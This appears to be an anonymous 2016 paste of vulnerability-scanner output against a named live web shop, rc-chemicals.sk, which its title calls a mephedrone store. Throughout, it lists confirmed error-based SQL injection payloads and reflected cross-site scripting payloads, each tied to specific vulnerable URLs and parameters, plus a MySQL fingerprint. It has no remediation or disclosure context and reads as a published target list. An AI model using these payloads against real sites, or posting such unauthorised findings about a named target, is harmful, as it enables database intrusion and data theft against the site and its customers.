rc-chemicals.sk - mefedron sklep

a guest
Sep 6th, 2016
* SQL Injection

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://rc-chemicals.sk/en,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="

* [High Possibility] SQL Injection

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://rc-chemicals.sk/en,szukaj
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"

* XSS (Cross-site Scripting)

Severity : Important
Confirmation : Confirmed
Vulnerable URL : http://rc-chemicals.sk/index.php?lang='"--></style></script><script>alert(0x0009BE)</script>&page=2
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: lang
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0009BE)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://rc-chemicals.sk/index.php?lang='"--></style></script><script>alert(0x000BE5)</script>&page=3
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: lang
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000BE5)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000D2B)</script>

Severity : Important
Confirmation : Confirmed
Vulnerable URL : http://rc-chemicals.sk/en,szukaj
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x001071)</script>

* MySQL Database Identified

Severity : Information
Confirmation : Confirmed
Vulnerable URL : http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications: -
Parameter Name: szukaj
Parameter Type: Post
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="